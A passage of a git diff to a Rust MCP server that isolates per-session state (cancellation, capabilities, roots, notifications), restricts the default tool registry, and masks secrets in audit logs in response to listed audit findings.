all_enabled_tool_groups_config_for_test().groups; groups.insert("podman".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2467,7 +2506,7 @@ mod tests { #[test] fn test_filtered_registry_disable_ldap() { - let mut groups = std::collections::HashMap::new(); + let mut groups = all_enabled_tool_groups_config_for_test().groups; groups.insert("ldap".to_string(), false); let config = ToolGroupsConfig { groups }; @@ -2484,7 +2523,7 @@ mod tests { #[test] fn test_all_tools_have_annotations_with_title() { - let registry = create_default_registry(); + let registry = create_all_enabled_registry(); for tool in registry.list_tools() { let ann = tool_annotations(&tool.name); assert!( @@ -2497,7 +2536,7 @@ mod tests { #[test] fn test_list_tools_includes_annotations() { - let registry = create_default_registry(); + let registry = create_all_enabled_registry(); let tools = registry.list_tools(); // All tools should have annotations since all have titles for tool in &tools { @@ -2642,7 +2681,7 @@ mod tests { #[test] fn test_no_duplicate_tool_names() { - let registry = create_default_registry(); + let registry = create_all_enabled_registry(); let tools = registry.list_tools(); let mut seen = std::collections::HashSet::new(); for tool in &tools { @@ -2656,7 +2695,7 @@ mod tests { #[test] fn test_all_tools_have_valid_schema_json() { - let registry = create_default_registry(); + let registry = create_all_enabled_registry(); for tool in registry.list_tools() { assert!( tool.input_schema.is_object(), @@ -2755,7 +2794,7 @@ mod tests { "templates", "pty", ]; - let registry = create_default_registry(); + let registry = create_all_enabled_registry(); for tool in registry.list_tools() { let group = tool_group(&tool.name); assert!( @@ -2768,7 +2807,7 @@ mod tests { #[test] fn test_annotation_consistency_read_only_not_destructive() { - let registry = create_default_registry(); + let registry = create_all_enabled_registry(); for tool in registry.list_tools() { let ann = tool_annotations(&tool.name); if ann.read_only_hint == Some(true) { @@ -2784,7 +2823,7 @@ mod tests { #[test] fn test_annotation_consistency_destructive_not_read_only() { - let registry = create_default_registry(); + let registry = create_all_enabled_registry(); for tool in registry.list_tools() { let ann = tool_annotations(&tool.name); if ann.destructive_hint == Some(true) { @@ -2798,6 +2837,49 @@ mod tests { } } + /// FIND-024 regression: `create_default_registry()` must only register + /// tools whose group is in `MINIMAL_DEFAULT_GROUPS`. The pre-FIND-024 + /// behaviour exposed all 357 handlers by default — that is the bug + /// this test pins. + #[test] + fn test_default_registry_only_contains_minimal_profile() { + use crate::config::types::MINIMAL_DEFAULT_GROUPS; + + let registry = create_default_registry(); + let tools: Vec = registry.list_tools().into_iter().map(|t| t.name).collect(); + + // Every tool in the default registry must belong to a + // minimal-profile group. + for tool_name in &tools { + let g = tool_group(tool_name); + assert!( + MINIMAL_DEFAULT_GROUPS.contains(&g), + "FIND-024: tool '{tool_name}' (group '{g}') is in default \ + registry but not in MINIMAL_DEFAULT_GROUPS" + ); + } + + // Each minimal-profile group must register at least one handler. + for &g in MINIMAL_DEFAULT_GROUPS { + let count_in_g = tools.iter().filter(|t| tool_group(t) == g).count(); + assert!( + count_in_g > 0, + "FIND-024: minimal-profile group '{g}' should have at \ + least one tool registered" + ); + } + + // Sanity: the default profile must not register every handler + // (otherwise the FIND-024 fix is silently regressed). + assert!( + tools.len() < all_tools_count(), + "FIND-024: default registry size ({}) equals total tool \ + count ({}) — has the default-disabled semantic regressed?", + tools.len(), + all_tools_count() + ); + } + #[test] fn test_tool_meta_large_output_tools() { // Tools known to produce large output should have _meta diff --git a/src/mcp/server.rs b/src/mcp/server.rs index ec7e4828..d4057990 100644 --- a/src/mcp/server.rs +++ b/src/mcp/server.rs @@ -22,7 +22,8 @@ use super::completion_provider::DefaultCompletionProvider; use super::logger::McpLogger; use super::pending_requests::{ClientResponse, PendingRequests}; use super::progress::ProgressReporter; -use super::protocol::{IncomingMessage, JsonRpcMessage, RootEntry, RootsListResult}; +use super::protocol::{IncomingMessage, JsonRpcMessage, RootsListResult}; +use super::session_context::{NotificationFanout, SessionContext}; use super::transport::{Session, Transport, stdio::StdioTransport}; use super::history::CommandHistory; @@ -61,10 +62,19 @@ pub struct McpServer { initialized: AtomicBool, concurrent_limit: Arc, client_info: RwLock>, - runtime_max_output_chars: Arc>>, - /// Writer channel for sending task status notifications from background workers. - /// Initialized in `run()` before the main loop starts. - notification_tx: Arc>>>, + /// Server-wide fanout registry of live session writer channels. + /// + /// Used by the config watcher (and any other server-wide event + /// source) to broadcast `list_changed` notifications to ALL live + /// sessions. Per-session direct delivery (progress, elicitation, + /// sampling, logging) goes through [`SessionContext::notification_tx`] + /// instead — the per-session tx is the only correct routing for + /// messages addressed to one specific client. + /// + /// FIND-034 (audit 2026-05-09) replaced the previous single + /// last-writer-wins `notification_tx` slot with this fanout + /// registry plus per-session `SessionContext` senders. + notification_fanout: NotificationFanout, /// Current minimum log level for MCP logging notifications. log_level: Arc, /// MCP logger for sending `notifications/message` to the client. @@ -72,35 +82,94 @@ pub struct McpServer { mcp_logger: Arc>>>, /// Completion provider for argument auto-completion. completion_provider: DefaultCompletionProvider, - /// Pending server-to-client requests (elicitation, sampling). - pending_requests: Arc, - /// Active resource subscriptions (uri -> list of subscription IDs). - resource_subscriptions: Arc>>>, - /// Client-declared roots (MCP Roots capability). - roots: Arc>>, - /// Whether the client supports `roots/list`. - client_supports_roots: AtomicBool, - /// Whether the client supports `elicitation/create` (MCP 2025-06-18+). - /// Populated from `InitializeParams.capabilities.elicitation` during the - /// handshake. Used by `handle_tools_call` to gate destructive operations - /// when `security.require_elicitation_on_destructive` is enabled. - client_supports_elicitation: AtomicBool, - /// Whether the client advertised the `sampling` capability during initialize. - /// Read by `ToolContext::sample` to short-circuit when the client cannot - /// satisfy `sampling/createMessage` requests. - client_supports_sampling: AtomicBool, /// Application metrics for token consumption analytics. metrics: Arc, - /// Map of in-flight MCP request IDs to their `CancellationToken`. +} + +/// Per-session map of in-flight JSON-RPC request ids to their +/// `CancellationToken`. +/// +/// FIND-038 (audit 2026-05-09): the previous implementation kept a +/// server-singleton map keyed on the JSON-RPC `id` alone. Because the +/// `id` is caller-chosen and is NOT scoped to a session, a concurrent +/// client B could send `notifications/cancelled { requestId: "" }` +/// and cancel an in-flight request belonging to client A. +/// +/// Allocating a fresh `ActiveRequests` per session in +/// `serve_session()` makes lookups session-local: a cancel notification +/// arriving on session B can only ever drain session B's map. +/// +/// `std::sync::Mutex` (not `tokio::sync::Mutex`) because we only hold the +/// lock for hashmap insert/remove — no `.await` inside the critical +/// section. +#[derive(Clone, Default)] +pub struct ActiveRequests( + Arc>>, +); + +impl ActiveRequests { + /// Build a fresh empty active-requests map. + #[must_use] + pub fn new() -> Self { + Self(Arc::new(std::sync::Mutex::new(HashMap::new()))) + } + + /// Register a new in-flight request and return its `CancellationToken`. /// - /// Populated at request spawn and drained when the request completes - /// (success or error). The `notifications/cancelled` handler looks up - /// a request by ID and calls `token.cancel()` to honor MCP 2025-11-25 - /// `notifications/cancelled`. + /// The caller must call [`Self::unregister`] when the request completes + /// (success or error) to avoid the map growing unbounded. + #[must_use] + pub fn register(&self, request_id: String) -> tokio_util::sync::CancellationToken { + let token = tokio_util::sync::CancellationToken::new(); + if let Ok(mut map) = self.0.lock() { + map.insert(request_id, token.clone()); + } + token + } + + /// Remove a request from the in-flight map. + /// + /// No-op if the request was already removed (e.g. cancelled before + /// completion). Tolerates a poisoned mutex silently — losing track of + /// one request is not worth a panic in a long-running server. + pub fn unregister(&self, request_id: &str) { + if let Ok(mut map) = self.0.lock() { + map.remove(request_id); + } + } + + /// Cancel an in-flight request by ID. /// - /// `std::sync::Mutex` (not `tokio::sync::Mutex`) because we only hold it - /// for hashmap insert/remove — no `.await` inside the critical section. - active_requests: Arc>>, + /// Returns `true` if a matching request was found and cancelled, + /// `false` if the ID is unknown (already completed or never existed). + /// + /// The map entry is removed atomically with the cancel signal so a + /// follow-up [`Self::unregister`] call from the spawned task becomes + /// a no-op. + pub fn cancel(&self, request_id: &str) -> bool { + let token = match self.0.lock() { + Ok(mut map) => map.remove(request_id), + Err(_) => return false, + }; + if let Some(token) = token { + token.cancel(); + true + } else { + false + } + } + + /// Number of currently-registered in-flight requests. Test helper. + #[cfg(test)] + fn len(&self) -> usize { + self.0.lock().map(|m| m.len()).unwrap_or(0) + } + + /// Snapshot of currently-registered request ids. Test helper. + #[cfg(test)] + fn contains(&self, id: &str) -> bool { + self.0.lock().map(|m| m.contains_key(id)).unwrap_or(false) + } } impl McpServer { @@ -119,13 +188,19 @@ impl McpServer { )); // Create audit logger (async with background writer task) - let (audit_logger, audit_task) = match AuditLogger::new(&config.audit) { - Ok((logger, task)) => (logger, task), - Err(e) => { - warn!(error = %e, "Failed to create audit logger, using disabled logger"); - (AuditLogger::disabled(), None) - } - }; + // Vuln 3 (audit 2026-05-09): wire a sanitizer so `event.command` is + // masked before tracing emission AND before file write — the audit + // log used to leak MYSQL_PWD/PGPASSWORD/Bearer tokens/webhook URLs. + let sanitizer_for_audit = + crate::security::Sanitizer::from_config(&config.security.sanitize); + let (audit_logger, audit_task) = + match AuditLogger::new_with_sanitizer(&config.audit, sanitizer_for_audit) { + Ok((logger, task)) => (logger, task), + Err(e) => { + warn!(error = %e, "Failed to create audit logger, using disabled logger"); + (AuditLogger::disabled(), None) + } + }; let audit_logger = Arc::new(audit_logger); // Create command history @@ -196,70 +271,95 @@ impl McpServer { initialized: AtomicBool::new(false), concurrent_limit, client_info: RwLock::new(None), - runtime_max_output_chars: Arc::new(RwLock::new(None)), - notification_tx: Arc::new(RwLock::new(None)), + notification_fanout: NotificationFanout::new(), log_level: Arc::new(AtomicU8::new(LogLevel::Warning.severity())), mcp_logger: Arc::new(RwLock::new(None)), completion_provider: DefaultCompletionProvider, - pending_requests: Arc::new(PendingRequests::new()), - resource_subscriptions: Arc::new(RwLock::new(HashMap::new())), - roots: Arc::new(RwLock::new(Vec::new())), - client_supports_roots: AtomicBool::new(false), - client_supports_elicitation: AtomicBool::new(false), - client_supports_sampling: AtomicBool::new(false), metrics: Arc::new(crate::metrics::Metrics::new()), - active_requests: Arc::new(std::sync::Mutex::new(HashMap::new())), }; (server, audit_task) } - /// Register a new in-flight request and return its `CancellationToken`. + /// Allocate a fresh per-session pending-requests handle. /// - /// The caller must call [`Self::unregister_request`] when the request - /// completes (success or error) to avoid the map growing unbounded. + /// Test helper used by `tests/multisession_isolation.rs` to verify + /// that two sessions on the same `McpServer` instance get independent + /// `Arc` instances (Vuln 8 audit 2026-05-09). + /// Integration tests live in their own crate so this helper cannot + /// be `#[cfg(test)]`; it is gated `#[doc(hidden)]` instead so it + /// stays out of the public docs. + #[doc(hidden)] #[must_use] - pub(crate) fn register_request( + pub fn allocate_session_pending_for_test(&self) -> Arc { + Arc::new(PendingRequests::new()) + } + + /// Allocate a fresh per-session capabilities handle. + /// + /// Test helper used by `tests/multisession_isolation.rs` to verify + /// that two sessions on the same `McpServer` instance get independent + /// `Arc` instances (Vuln 9 audit 2026-05-09). + /// Integration tests live in their own crate so this helper cannot + /// be `#[cfg(test)]`; it is gated `#[doc(hidden)]` instead so it + /// stays out of the public docs. + #[doc(hidden)] + #[must_use] + pub fn allocate_session_capabilities_for_test( &self, - request_id: String, - ) -> tokio_util::sync::CancellationToken { - let token = tokio_util::sync::CancellationToken::new(); - if let Ok(mut map) = self.active_requests.lock() { - map.insert(request_id, token.clone()); - } - token + ) -> Arc { + Arc::new(crate::mcp::session_capabilities::SessionCapabilities::new()) } - /// Remove a request from the in-flight map. + /// Allocate a fresh per-session `ActiveRequests` handle. /// - /// No-op if the request was already removed (e.g. cancelled before - /// completion). Tolerates a poisoned mutex silently — losing track of - /// one request is not worth a panic in a long-running server. - pub(crate) fn unregister_request(&self, request_id: &str) { - if let Ok(mut map) = self.active_requests.lock() { - map.remove(request_id); - } + /// Test helper used by `tests/cross_session_cancel.rs` to verify + /// that two sessions on the same `McpServer` instance get independent + /// `ActiveRequests` instances (FIND-038 audit 2026-05-09). + /// Integration tests live in their own crate so this helper cannot + /// be `#[cfg(test)]`; it is gated `#[doc(hidden)]` instead so it + /// stays out of the public docs. + #[doc(hidden)] + #[must_use] + pub fn allocate_session_active_requests_for_test(&self) -> ActiveRequests { + ActiveRequests::new() } - /// Cancel an in-flight request by ID. + /// Allocate a fresh per-session `runtime_max_output_chars` slot. /// - /// Returns `true` if a matching request was found and cancelled, - /// `false` if the ID is unknown (already completed or never existed). + /// Test helper used by `tests/per_session_state.rs` to verify + /// that two sessions on the same `McpServer` instance get independent + /// runtime override slots (FIND-033 audit 2026-05-09). + #[doc(hidden)] + #[must_use] + pub fn allocate_session_runtime_max_output_for_test(&self) -> Arc>> { + Arc::new(RwLock::new(None)) + } + + /// Allocate a fresh per-session resource-subscriptions map. /// - /// The map entry is removed atomically with the cancel signal so a - /// follow-up `unregister_request` call from the spawned task becomes - /// a no-op. - pub(crate) fn cancel_request(&self, request_id: &str) -> bool { - let token = match self.active_requests.lock() { - Ok(mut map) => map.remove(request_id), - Err(_) => return false, - }; - if let Some(token) = token { - token.cancel(); - true - } else { - false - } + /// Test helper used by `tests/per_session_state.rs` to verify + /// that two sessions on the same `McpServer` instance get independent + /// subscription maps (FIND-036 audit 2026-05-09). + #[doc(hidden)] + #[must_use] + pub fn allocate_session_resource_subs_for_test( + &self, + ) -> Arc>>> { + Arc::new(RwLock::new(HashMap::new())) + } + + /// Allocate a fresh per-session roots vec. + /// + /// Test helper used by `tests/per_session_state.rs` to verify + /// that two sessions on the same `McpServer` instance get independent + /// `Vec` instances (FIND-037 audit 2026-05-09). + #[doc(hidden)] + #[must_use] + pub fn allocate_session_roots_for_test( + &self, + ) -> Arc>> { + Arc::new(RwLock::new(Vec::new())) } /// Create a `ToolContext` for tool execution @@ -282,7 +382,7 @@ impl McpServer { &self, tool_name: &str, arguments: Option<&Value>, - notification_tx: Option<&mpsc::Sender>, + session: Option<&SessionContext>, ) -> std::result::Result<(), String> { let require = { let cfg = self.config.read().await; @@ -299,22 +399,27 @@ impl McpServer { return Ok(()); } - if !self.client_supports_elicitation.load(Ordering::Relaxed) { + // Per-session capabilities (Vuln 9 audit 2026-05-09): the server no + // longer keeps a global `client_supports_elicitation` AtomicBool, so + // the gate MUST consult THIS session's `SessionCapabilities`. Without + // a session handle (legacy non-MCP code paths), refuse the operation + // since we cannot prove the connected client advertised the capability. + let Some(session) = session else { + return Err(format!( + "Tool `{tool_name}` is destructive and `require_elicitation_on_destructive` is enabled, but no session context is available — the operation cannot be confirmed." + )); + }; + if !session.caps.supports_elicitation() { return Err(format!( "Tool `{tool_name}` is destructive and `require_elicitation_on_destructive` is enabled, but the client does not support elicitation. Either upgrade the client or set `security.require_elicitation_on_destructive: false`." )); } - let Some(tx) = notification_tx.cloned().or_else(|| { - self.notification_tx - .try_read() - .ok() - .and_then(|g| g.as_ref().cloned()) - }) else { - return Err(format!( - "Tool `{tool_name}` requires user confirmation but no notification channel is available." - )); - }; + let tx = session.notification_tx.clone(); + // Per-session pending-requests map (Vuln 8 audit 2026-05-09): the + // server no longer keeps a global handle, so the elicitation + // round-trip MUST run against the session-local map. + let pending = Arc::clone(&session.pending); let summary = arguments.map_or_else( || "(no arguments)".to_string(), @@ -330,7 +435,7 @@ impl McpServer { let requester = Arc::new(super::client_requester::ClientRequester::new( tx, - Arc::clone(&self.pending_requests), + pending, std::time::Duration::from_secs(120), )); let elicitation = super::elicitation::ElicitationService::new(requester); @@ -353,8 +458,8 @@ impl McpServer { async fn create_tool_context( &self, cancel_token: Option, - notification_tx: Option>, progress_token: Option, + session: Option<&SessionContext>, ) -> ToolContext { // Read config snapshot let mut config_snapshot = { @@ -362,8 +467,11 @@ impl McpServer { guard.clone() }; - // Apply runtime override to the snapshot so handlers see the effective value - if let Some(runtime_val) = *self.runtime_max_output_chars.read().await { + // Apply per-session runtime override to the snapshot so handlers + // see THIS session's effective value (FIND-033 audit 2026-05-09). + if let Some(s) = session + && let Some(runtime_val) = *s.runtime_max_output.read().await + { config_snapshot.limits.max_output_chars = runtime_val; } @@ -380,15 +488,26 @@ impl McpServer { ); ctx.tunnel_manager = Arc::clone(&self.tunnel_manager); ctx.output_cache = Some(Arc::clone(&self.output_cache)); - ctx.runtime_max_output_chars = Some(Arc::clone(&self.runtime_max_output_chars)); - ctx.roots = self.roots.read().await.to_vec(); + // Per-session runtime override slot exposed to `ssh_config_set` + // (FIND-033 audit 2026-05-09). When the writer mutates this slot, + // subsequent `create_tool_context` calls on the SAME session pick + // up the new value — and only this session's tool calls are + // affected. + if let Some(s) = session { + ctx.runtime_max_output_chars = Some(Arc::clone(&s.runtime_max_output)); + ctx.roots.clone_from(&*s.roots.read().await); + } ctx.metrics = Some(Arc::clone(&self.metrics)); ctx.cancel_token = cancel_token; - ctx.notification_tx = notification_tx; + ctx.notification_tx = session.map(|s| s.notification_tx.clone()); ctx.progress_token = progress_token; - ctx.pending_requests = Some(Arc::clone(&self.pending_requests)); - ctx.client_supports_elicitation = self.client_supports_elicitation.load(Ordering::Relaxed); - ctx.client_supports_sampling = self.client_supports_sampling.load(Ordering::Relaxed); + ctx.pending_requests = session.map(|s| Arc::clone(&s.pending)); + // Per-session capabilities (Vuln 9 audit 2026-05-09): the server no + // longer holds global `client_supports_*` flags. Snapshot the + // current session's flags into `ToolContext`; default to `false` + // when no session handle is available (legacy non-MCP code paths). + ctx.client_supports_elicitation = session.is_some_and(|s| s.caps.supports_elicitation()); + ctx.client_supports_sampling = session.is_some_and(|s| s.caps.supports_sampling()); ctx.mcp_logger = self.mcp_logger.read().await.as_ref().map(Arc::clone); ctx } @@ -544,26 +663,20 @@ impl McpServer { /// Start a config file watcher that broadcasts `list_changed` /// notifications on reload. /// - /// The watcher reads `self.notification_tx` at callback time rather - /// than capturing a specific session's sender, so it continues to - /// work as sessions come and go. Last-writer-wins semantics are - /// acceptable for stdio (single session) and are replaced by a - /// per-session fanout in A.3. + /// FIND-034 (audit 2026-05-09): the previous topology read a single + /// global `notification_tx` slot at callback time, so the broadcast + /// reached only the most recently registered session. The watcher + /// now uses [`NotificationFanout::broadcast`], which fans the + /// notifications out to every live session's per-session sender. fn spawn_config_watcher(&self, path: &Path) -> Option { - let notification_tx_slot = Arc::clone(&self.notification_tx); + let fanout = self.notification_fanout.clone(); let on_reload: Arc = Arc::new(move || { - // `blocking_read` is fine here: the slot is only written - // once per session start (held briefly) and the reload - // callback runs on a background thread owned by notify. - let guard = notification_tx_slot.blocking_read(); - if let Some(tx) = guard.as_ref() { - let _ = tx.try_send(WriterMessage::Notification( - JsonRpcNotification::tools_list_changed(), - )); - let _ = tx.try_send(WriterMessage::Notification( - JsonRpcNotification::resources_list_changed(), - )); - } + fanout.broadcast(&WriterMessage::Notification( + JsonRpcNotification::tools_list_changed(), + )); + fanout.broadcast(&WriterMessage::Notification( + JsonRpcNotification::resources_list_changed(), + )); }); ConfigWatcher::with_notifications( @@ -590,16 +703,29 @@ impl McpServer { async fn serve_session(self: Arc, session: Session) { let (tx, mut rx) = mpsc::channel::(100); - // Store the per-session writer channel globally so config - // watcher + background workers can find a live sender. With - // stdio this is set once and cleared on exit; with multi- - // session transports A.3 will replace this with a per-session - // fanout that tracks every live session. - *self.notification_tx.write().await = Some(tx.clone()); + // Allocate the per-session bundle: pending-requests map (Vuln 8), + // capability flags (Vuln 9), active-requests map (FIND-038), + // notification tx, runtime override slot (FIND-033), resource + // subscriptions map (FIND-036), and roots vec (FIND-037). Every + // field is Arc-wrapped so cloning the bundle into spawned tasks + // is cheap. + let session_ctx = SessionContext::new(tx.clone()); + + // Register this session's tx with the server-wide fanout so the + // config watcher (and any other broadcaster) reaches us. The + // returned guard removes the registration on drop — including + // panics — so dead senders never accumulate (FIND-034). + let fanout_guard = self.notification_fanout.register(tx.clone()); // Create / refresh MCP logger (writes `notifications/message` // to the client) now that we have a tx for this session. - let mcp_logger = Arc::new(McpLogger::new(Arc::clone(&self.log_level), tx.clone())); + // FIND-035: McpLogger is gated by the SESSION's log_level so + // `notifications/setLevel` from this client cannot mute another + // client's notifications. + let mcp_logger = Arc::new(McpLogger::new( + Arc::clone(&session_ctx.log_level), + tx.clone(), + )); *self.mcp_logger.write().await = Some(Arc::clone(&mcp_logger)); // Writer task: consume the channel, forward every message to @@ -636,7 +762,8 @@ impl McpServer { match incoming { IncomingMessage::Single(message) => { - let Some(request) = self.route_incoming_message(message, &tx).await else { + let Some(request) = self.route_incoming_message(message, &session_ctx).await + else { continue; }; @@ -659,8 +786,9 @@ impl McpServer { }); let cancel_token = request_id .as_ref() - .map(|id| server.register_request(id.clone())); + .map(|id| session_ctx.active_requests.register(id.clone())); let rid_cleanup = request_id; + let session_ctx_for_task = session_ctx.clone(); // Attach request-scoped tracing fields. `.instrument()` // (not `.entered()`) because `EnteredSpan` is not @@ -671,15 +799,18 @@ impl McpServer { id = ?rid_cleanup, method = %request.method, ); - let session_tx = tx.clone(); tokio::spawn( async move { let response = server - .handle_request_with_cancel(request, cancel_token, Some(session_tx)) + .handle_request_with_cancel( + request, + cancel_token, + Some(&session_ctx_for_task), + ) .await; let _ = tx.send(WriterMessage::Response(Box::new(response))).await; if let Some(rid) = rid_cleanup { - server.unregister_request(&rid); + session_ctx_for_task.active_requests.unregister(&rid); } drop(permit); } @@ -753,20 +884,18 @@ impl McpServer { info!("Client disconnected, session ending"); - // Clear the per-session writer channel from the global slot so - // the config watcher stops trying to send into a dead channel. - // Only clear if it still points at our tx (another session may - // have overwritten it in the meantime). - { - let mut slot = self.notification_tx.write().await; - if slot.as_ref().is_some_and(|cur| cur.same_channel(&tx)) { - *slot = None; - } - } + // The fanout guard removes our tx from the broadcast registry on + // drop (end of this function), so the config watcher stops + // trying to send into a dead channel without us touching any + // shared state here. - // Signal writer to stop and wait for it. + // Signal writer to stop and wait for it. Then explicitly drop + // the fanout guard so the session's tx is removed from the + // broadcast registry — the lexical drop at end-of-scope would + // do this too, but being explicit documents the contract. drop(tx); let _ = writer_handle.await; + drop(fanout_guard); } /// Parse an incoming line as a single JSON-RPC message or a batch. @@ -787,10 +916,22 @@ impl McpServer { /// /// Returns `Some(JsonRpcRequest)` if it's a request to be dispatched, /// or `None` if it was handled inline (e.g., a client response or notification). + /// + /// The `session_pending` argument is the per-session pending-requests + /// map (Vuln 8 audit 2026-05-09). Client responses to server-initiated + /// requests are resolved against THIS session's map only — a different + /// client on the same daemon cannot resolve a request another session + /// initiated. + /// + /// The `session_active_requests` argument is the per-session + /// active-requests map (FIND-038 audit 2026-05-09). Client cancel + /// notifications are dispatched against THIS session's map only — a + /// different client cannot cancel a request another session is + /// running. async fn route_incoming_message( &self, message: JsonRpcMessage, - tx: &mpsc::Sender, + session: &SessionContext, ) -> Option { // If no method, it's a response to a server-initiated request (elicitation/sampling) if message.method.is_none() { @@ -808,7 +949,7 @@ impl McpServer { } else { ClientResponse::Success(message.result.unwrap_or(Value::Null)) }; - if !self.pending_requests.resolve(&id_str, response) { + if !session.pending.resolve(&id_str, response) { debug!(id = %id_str, "Received response for unknown request ID"); } } @@ -817,15 +958,18 @@ impl McpServer { // Handle client notifications (no response needed per JSON-RPC 2.0) if message.method.as_deref() == Some("notifications/roots/list_changed") { - self.handle_roots_changed(tx).await; + self.handle_roots_changed(session).await; return None; } if message.method.as_deref() == Some("notifications/cancelled") { - self.handle_cancellation_notification(message.params.as_ref()); + Self::handle_cancellation_notification( + &session.active_requests, + message.params.as_ref(), + ); return None; } if message.method.as_deref() == Some("notifications/initialized") { - self.handle_initialized_notification(tx).await; + self.handle_initialized_notification(session).await; return None; } @@ -839,14 +983,21 @@ impl McpServer { } /// Fetch roots from the client after initialization. - async fn fetch_roots(&self, tx: &mpsc::Sender) { - if !self.client_supports_roots.load(Ordering::Relaxed) { + /// + /// Uses the SESSION-LOCAL pending-requests map so a `roots/list` + /// response coming back from the client is resolved against this + /// session only (Vuln 8 audit 2026-05-09). The fetched roots are + /// stored on the session-local roots slot (FIND-037 audit + /// 2026-05-09): a different client's `roots/list` response cannot + /// overwrite this session's roots. + async fn fetch_roots(&self, session: &SessionContext) { + if !session.caps.supports_roots() { return; } let requester = super::client_requester::ClientRequester::new( - tx.clone(), - Arc::clone(&self.pending_requests), + session.notification_tx.clone(), + Arc::clone(&session.pending), std::time::Duration::from_secs(10), ); @@ -854,7 +1005,7 @@ impl McpServer { Ok(value) => { if let Ok(result) = serde_json::from_value::(value) { info!(count = result.roots.len(), "Received client roots"); - *self.roots.write().await = result.roots; + *session.roots.write().await = result.roots; } } Err(e) => { @@ -864,21 +1015,16 @@ impl McpServer { } /// Handle `notifications/roots/list_changed` — re-fetch roots. - async fn handle_roots_changed(&self, tx: &mpsc::Sender) { + async fn handle_roots_changed(&self, session: &SessionContext) { info!("Client roots changed, re-fetching"); - self.fetch_roots(tx).await; + self.fetch_roots(session).await; } /// Handle `notifications/initialized` — fetch client roots if supported. /// No response is emitted (per JSON-RPC 2.0 notification semantics). - async fn handle_initialized_notification(&self, tx: &mpsc::Sender) { + async fn handle_initialized_notification(&self, session: &SessionContext) { info!("Client sent notifications/initialized; fetching roots"); - self.fetch_roots(tx).await; - } - - /// Get the current client roots (for path validation). - pub async fn get_roots(&self) -> Vec { - self.roots.read().await.clone() + self.fetch_roots(session).await; } /// Handle a single JSON-RPC request and return the response. @@ -888,6 +1034,11 @@ impl McpServer { /// request. The stdio `run()` loop uses the internal /// `handle_request_with_cancel` variant to honor MCP /// `notifications/cancelled`. + /// + /// Server-to-client features (elicitation, sampling) are unavailable on + /// this code path because no per-session pending-requests map is + /// supplied. Use [`Self::serve`] / [`Self::serve_session`] for full + /// MCP feature support. pub async fn handle_request(&self, request: JsonRpcRequest) -> JsonRpcResponse { self.handle_request_with_cancel(request, None, None).await } @@ -912,15 +1063,15 @@ impl McpServer { &self, request: JsonRpcRequest, cancel_token: Option, - notification_tx: Option>, + session: Option<&SessionContext>, ) -> JsonRpcResponse { let id = request.id.clone(); match request.method.as_str() { - "initialize" => self.handle_initialize(id, request.params).await, + "initialize" => self.handle_initialize(id, request.params, session).await, "tools/list" => self.handle_tools_list(id, request.params.as_ref()), "tools/call" => { - self.handle_tools_call(id, request.params, cancel_token, notification_tx) + self.handle_tools_call(id, request.params, cancel_token, session) .await } "prompts/list" => self.handle_prompts_list(id), @@ -932,10 +1083,16 @@ impl McpServer { "tasks/list" => self.handle_tasks_list(id, request.params).await, "tasks/cancel" => self.handle_tasks_cancel(id, request.params).await, "completions/complete" => self.handle_completions_complete(id, request.params), - "logging/setLevel" => self.handle_logging_set_level(id, request.params), + "logging/setLevel" => self.handle_logging_set_level(id, request.params, session), "resources/templates/list" => self.handle_resource_templates_list(id), - "resources/subscribe" => self.handle_resource_subscribe(id, request.params).await, - "resources/unsubscribe" => self.handle_resource_unsubscribe(id, request.params).await, + "resources/subscribe" => { + self.handle_resource_subscribe(id, request.params, session) + .await + } + "resources/unsubscribe" => { + self.handle_resource_unsubscribe(id, request.params, session) + .await + } "ping" => JsonRpcResponse::success(id, json!({})), _ => { error!(method = %request.method, "Unknown method"); @@ -967,7 +1124,12 @@ impl McpServer { } #[allow(clippy::too_many_lines)] - async fn handle_initialize(&self, id: Option, params: Option) -> JsonRpcResponse { + async fn handle_initialize( + &self, + id: Option, + params: Option, + session: Option<&SessionContext>, + ) -> JsonRpcResponse { // Parse initialize params, negotiate version, and store client info let mut negotiated_version = PROTOCOL_VERSION.to_string(); @@ -1004,25 +1166,39 @@ impl McpServer { max_output_chars = effective, "Applied client-specific max_output_chars override" ); - *self.runtime_max_output_chars.write().await = Some(effective); + // Per-session runtime override (FIND-033 audit 2026-05-09): + // write to THIS session's slot only; concurrent clients + // with different `client_overrides` profiles do not + // contaminate each other. + if let Some(s) = session { + *s.runtime_max_output.write().await = Some(effective); + } } - // Check if client supports roots capability + // Per-session capabilities (Vuln 9 audit 2026-05-09): write + // each client's advertised flags to its OWN + // `SessionCapabilities`, not a server-wide AtomicBool. The + // legacy non-MCP code paths (`handle_request`) pass `None` + // and silently drop these flags — that's fine because they + // also can't initiate elicitation/sampling/roots. if init_params.capabilities.roots.is_some() { - self.client_supports_roots.store(true, Ordering::Relaxed); + if let Some(s) = session { + s.caps.set_supports_roots(true); + } info!("Client supports roots capability"); } - // Check if client supports elicitation capability if init_params.capabilities.elicitation.is_some() { - self.client_supports_elicitation - .store(true, Ordering::Relaxed); + if let Some(s) = session { + s.caps.set_supports_elicitation(true); + } info!("Client supports elicitation capability"); } - // Check if client supports sampling capability if init_params.capabilities.sampling.is_some() { - self.client_supports_sampling.store(true, Ordering::Relaxed); + if let Some(s) = session { + s.caps.set_supports_sampling(true); + } info!("Client supports sampling capability"); } @@ -1158,7 +1334,7 @@ impl McpServer { id: Option, params: Option, cancel_token: Option, - notification_tx: Option>, + session: Option<&SessionContext>, ) -> JsonRpcResponse { let Some(params) = params else { return JsonRpcResponse::error(id, JsonRpcError::invalid_params("Missing params")); @@ -1191,17 +1367,14 @@ impl McpServer { } // Create progress reporter if the client sent a progressToken. - // Prefer the per-session `notification_tx`; fall back to the - // global slot for legacy call sites (unit tests mostly). + // Use the per-session `notification_tx` only — there is no + // cross-session fallback (FIND-034 audit 2026-05-09). let progress_reporter = call_params .meta .as_ref() .and_then(|m| m.progress_token.clone()) .and_then(|token| { - let tx = notification_tx.clone().or_else(|| { - let tx_guard = self.notification_tx.try_read().ok()?; - tx_guard.as_ref().cloned() - })?; + let tx = session.map(|s| s.notification_tx.clone())?; Some(ProgressReporter::new(token, tx, Some(3))) }); @@ -1213,7 +1386,7 @@ impl McpServer { .check_destructive_elicitation( &call_params.name, call_params.arguments.as_ref(), - notification_tx.as_ref(), + session, ) .await { @@ -1231,11 +1404,11 @@ impl McpServer { call_params.arguments, task_request, id, - notification_tx, call_params .meta .as_ref() .and_then(|m| m.progress_token.clone()), + session, ) .await; } @@ -1248,11 +1421,11 @@ impl McpServer { let ctx = self .create_tool_context( cancel_token, - notification_tx, call_params .meta 